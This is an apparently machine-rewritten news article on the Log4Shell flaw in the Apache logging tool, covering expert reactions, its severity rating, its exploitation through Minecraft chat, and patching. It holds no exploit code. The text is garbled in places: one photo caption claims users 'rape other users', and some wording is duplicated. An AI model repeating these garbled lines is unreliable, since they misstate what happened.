Log4shell software flaw threatens millions of servers as hackers scramble to exploit it

A critical vulnerability in a widely used software tool – one quickly exploited in the online game Minecraft – is quickly emerging as a major threat to organizations around the world.

“The internet is on fire right now,” said Adam Meyers, senior vice president of intelligence at cybersecurity firm Crowdstrike.

“People are jostling to patch [it] and all kinds of people are jostling to exploit it, ”he said.

He said Friday morning US time that in the 12 hours since the bug was revealed, it had been “fully militarized,” meaning criminals have developed and distributed tools to exploit it.

The flaw may be the worst IT vulnerability discovered in years.

It was discovered in an open source logging tool that is ubiquitous in cloud servers and enterprise software used in industry and government.

Unless it is fixed, it allows criminals, spies and programming novices with easy access to internal networks where they can loot valuable data, implant malware, erase crucial information and much more.

“I would be hard pressed to think of a company that is completely risk free,” said Joe Sullivan, chief security officer of Cloudflare, whose online infrastructure protects websites from malicious actors.

The logging tool is installed on millions of servers, and experts said the fallout would not be known for several days.

Amit Yoran, CEO of cybersecurity firm Tenable, called it “the biggest and most critical vulnerability of the past decade” – and perhaps the biggest in modern computing history.

No password required

The vulnerability, dubbed Log4Shell, was rated 10 on a scale of 1 to 10 by the Apache Software Foundation, which oversees the development of the tool.

Anyone with the ability to operate it can gain full access to an unpatched computer that is running the software.

Experts have said that the extreme ease with which the vulnerability allows an attacker to access a web server – without a password – is what makes it so dangerous.

Lydia Winters stands on stage with signs showing Microsoft's Minecraft game at Xbox E3 2015 briefing
Experts say Minecraft users have already exploited the loophole to rape other users by pasting a short message into a chat box.(AP: Damian Dovarganes, dossier)

The New Zealand Computer Emergency Response Team was among the first to report that the vulnerability was “actively exploited in the wild” just hours after it was released on Thursday and a patch was released.

The vulnerability, located in the open source Apache software used to run websites and other web services, was reported to the foundation on November 24 by Chinese tech giant Alibaba, he said.

It took two weeks to develop and release a fix.

But fixing systems around the world could be a complicated task.

While most organizations and cloud providers like Amazon should be able to update their web servers with ease, the same Apache software is also often bundled with third-party programs, which often can only be updated by their owners. .

Mr Yoran, from Tenable, said organizations need to assume they have been compromised and act quickly.

The first obvious signs that the vulnerability was being exploited were in Minecraft, a popular online Microsoft game from Microsoft.

Mr Meyers and security expert Marcus Hutchins said Minecraft users are already using it to run programs on other users’ computers by pasting a short message into a chat box.

Microsoft said it has released a software update for Minecraft users.

Researchers reported finding evidence that the vulnerability could be exploited on servers managed by companies such as Apple, Amazon, Twitter, and Cloudflare.

Cloudflare’s Mr Sullivan said there was no indication that his company’s servers had been compromised.

Apple, Amazon and Twitter did not immediately respond to requests for comment.


Previous Microsoft Researchers: We trained AI to find software bugs using hide and seek
Next Is your child addicted to online games? The government issues advice to parents and teachers. Details here